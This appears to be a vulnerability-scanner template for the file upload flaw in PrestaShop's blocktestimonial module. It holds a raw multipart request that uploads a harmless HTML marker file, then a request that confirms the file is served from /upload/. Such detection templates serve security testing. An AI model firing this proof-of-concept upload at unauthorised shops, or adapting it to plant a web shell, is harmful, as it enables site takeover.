70 lines
2.0 KiB
YAML
70 lines
2.0 KiB
YAML
id: prestashop-blocktestimonial-file-upload
|
|
|
|
info:
|
|
name: Prestashop Blocktestimonial Modules - File Upload Vulnerability
|
|
author: MaStErChO
|
|
severity: critical
|
|
reference:
|
|
- https://3xploit7.blogspot.com/2016/12/pretashop-blocktestimonial-upload-shell.html
|
|
- https://github.com/indoxploit-coders/blocktestimonial-file-upload
|
|
- https://exploit.linuxsec.org/prestashop-module-blocktestimonial-file-upload-auto-exploit
|
|
metadata:
|
|
framework: prestashop
|
|
shodan-query: http.component:"prestashop"
|
|
tags: intrusive,file-upload,blocktestimonial,prestashop
|
|
|
|
variables:
|
|
filename: '{{rand_base(7, "abc")}}'
|
|
data: '{{rand_base(6, "abc")}}'
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /modules/blocktestimonial/addtestimonial.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLSo7Btb6nGcpR9Cl
|
|
|
|
------WebKitFormBoundaryLSo7Btb6nGcpR9Cl
|
|
Content-Disposition: form-data; name="testimonial_submitter_name"
|
|
|
|
{{data}}
|
|
------WebKitFormBoundaryLSo7Btb6nGcpR9Cl
|
|
Content-Disposition: form-data; name="testimonial_title"
|
|
|
|
{{data}}
|
|
------WebKitFormBoundaryLSo7Btb6nGcpR9Cl
|
|
Content-Disposition: form-data; name="testimonial_main_message"
|
|
|
|
{{data}}
|
|
------WebKitFormBoundaryLSo7Btb6nGcpR9Cl
|
|
Content-Disposition: form-data; name="testimonial_img"; filename="{{filename}}.html"
|
|
Content-Type: text/html
|
|
|
|
<html>
|
|
<body>
|
|
<h1>{{data}}</h1>
|
|
</body>
|
|
</html>
|
|
|
|
------WebKitFormBoundaryLSo7Btb6nGcpR9Cl
|
|
Content-Disposition: form-data; name="testimonial"
|
|
|
|
Submit Testimonial
|
|
------WebKitFormBoundaryLSo7Btb6nGcpR9Cl--
|
|
|
|
- |
|
|
GET /upload/{{filename}}.html HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body_1
|
|
words:
|
|
- "Your testimonial was submitted successfully."
|
|
|
|
- type: word
|
|
part: body_2
|
|
words:
|
|
- "{{data}}"
|